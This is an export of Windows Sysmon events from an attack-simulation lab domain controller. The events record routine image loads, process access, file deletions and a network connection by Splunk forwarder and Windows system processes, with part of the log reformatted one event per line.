Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x8000000000000000100576Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x8000000000000000100575Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x8000000000000000100574Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000100573Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft 
Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x8000000000000000100572Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x8000000000000000100571Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x8000000000000000100570Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 
734700x8000000000000000100569Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x8000000000000000100568Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x8000000000000000100567Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x8000000000000000100566Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x8000000000000000100565Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x8000000000000000100564Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000100563Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x8000000000000000100562Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100561Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 10341000x8000000000000000100560Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
734700x8000000000000000100559Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x8000000000000000100558Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x8000000000000000100557Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100556Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exeMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2trueSplunk, Inc.Valid 10341000x8000000000000000100555Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100554Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:46.890{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100553Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100552Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:46.890{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100551Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-A252-6294-0500-000000005502}4161908C:\Windows\system32\csrss.exe{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000100550Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000100549Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.891{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000100548Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.378{326FD73D-A262-6294-2400-000000005502}2732NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-099f25d280474ac19\channels\health\respondent-20220530105428-128MD5=3A7897B317CA03B79FE07533175F9643,SHA256=F76FF17815B8F96571634A983322FD544389A7130FC207258DDFB92658757A4D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk 
space 354300x8000000000000000100547Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:42.158{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53362-false10.0.1.12-8000- 734700x8000000000000000100546Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.173{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x8000000000000000100545Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.173{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x8000000000000000100544Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.173{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating 
SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 23542300x8000000000000000100657Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.652{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=477A4615B5B5F3A25F8490657F5741BC,SHA256=5D6D2ADCB19FEAFBC862A9871533FB65C81EE6806DDAF3C9ADA42BDB57B4965C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000100656Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.543{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x8000000000000000100655Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.543{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 
Sysmon events from the Microsoft-Windows-Sysmon/Operational channel of win-dc-ctus-attack-range-994.attackrange.local, 2022-05-30 13:06:47 to 13:06:49 UTC. The export had run the XML fields of every event together; below they are laid out one event per line with the field names of the Sysmon event schema restored and the fields separated by " ; ". Fields identical in every event are given once: Channel=Microsoft-Windows-Sysmon/Operational ; Computer=win-dc-ctus-attack-range-994.attackrange.local ; Level=4 ; Opcode=0 ; Keywords=0x8000000000000000 ; RuleName=-. Task equals EventID in every event; Version is 3 for EventID 7 and 10 and 5 for EventID 1 and 23. The export had also concatenated SourceProcessId and SourceThreadId in EventID 10; they are split here (for conhost.exe in record 100613 as 5372/5392, the split consistent with the four-digit identifiers of the other records). CallTrace keeps Sysmon's own "|" frame separators. Order is as exported: records 100654 down to 100597, then 100659, 100658 and 100763 down to 100759.

EventID=7 ; EventRecordID=100654 ; UtcTime=2022-05-30 13:06:47.543 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\dbghelp.dll ; FileVersion=10.0.14321.1024 (rs1_release.160715-1616) ; Description=Windows Image Helper ; Product=Microsoft® Windows® Operating System ; Company=Microsoft ; OriginalFileName=DBGHELP.DLL ; Hashes=MD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBE ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100653 ; UtcTime=2022-05-30 13:06:47.418 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\cryptbase.dll ; FileVersion=10.0.14393.0 (rs1_release.160715-1616) ; Description=Base cryptographic API DLL ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=cryptbase.dll ; Hashes=MD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4 ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
